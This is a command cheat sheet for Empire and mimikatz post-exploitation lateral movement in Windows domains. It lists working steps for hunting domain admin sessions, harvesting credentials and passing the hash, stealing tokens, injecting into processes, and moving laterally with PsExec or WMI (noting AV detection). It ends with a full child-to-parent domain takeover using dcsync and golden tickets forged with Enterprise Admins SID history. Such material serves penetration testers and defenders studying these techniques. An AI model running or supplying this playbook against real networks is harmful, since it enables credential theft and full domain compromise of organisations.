# Lateral Movement

```
Find machines where domain admins are logged on
>usemodule situational_awareness/network/powerview/user_hunter
```

**Token theft**

```
>mimikatz
>creds                 list and organise the harvested hashes and passwords
>pth {CredID}          spawn a process under the stored credential's hash (sekurlsa::pth); note the PID it reports
>steal_token {PID}     impersonate that process's token (e.g. the domain admin's)
```

**Session injection**

```
>ps                                  list processes and pick a target PID
>usemodule management/psinject       set ProcId (the target PID) and Listener
```

**Pass-the-Hash**

```
Invoke-PsExec may be flagged by AV
>usemodule situational_awareness/network/powerview/find_localadmin_access   list machines where the current user is local admin (PsExec targets)
>usemodule lateral_movement/invoke_psexec    set ComputerName and Listener
or
>usemodule lateral_movement/invoke_wmi       set ComputerName, Listener and CredID
```

**Cross-domain (child domain to parent domain)**

```
Parent domain DC:        dc.zone.com
Child domain DC:         sub.zone.com
Child domain computer:   pc.sub.zone.com
Child domain user:       sub\user1
View trust relationships
>usemodule situational_awareness/network/powerview/get_domain_trust
Get the parent domain SID: run management/user_to_sid with Domain set to the parent domain and User=krbtgt;
the returned SID is <parent domain SID>-502, so drop the trailing -502 to get the domain SID
>usemodule credentials/mimikatz/dcsync          target user sub\krbtgt to get the child domain krbtgt hash
>usemodule credentials/mimikatz/golden_ticket   forge a ticket with SID history:
                                                set user to the forged user name, sid to the child domain SID,
                                                krbtgt to the child krbtgt hash, and sids to <parent domain SID>-519
                                                (Enterprise Admins; not <krbtgt SID>-519)
>usemodule credentials/mimikatz/dcsync          now dump the parent domain krbtgt hash
>usemodule credentials/mimikatz/golden_ticket   forge a parent-domain ticket with the parent krbtgt hash
                                                (set CredID to the parent credential, plus user and domain)
>shell dir \\dc.zone.com\c$                     verify access to the parent DC
```

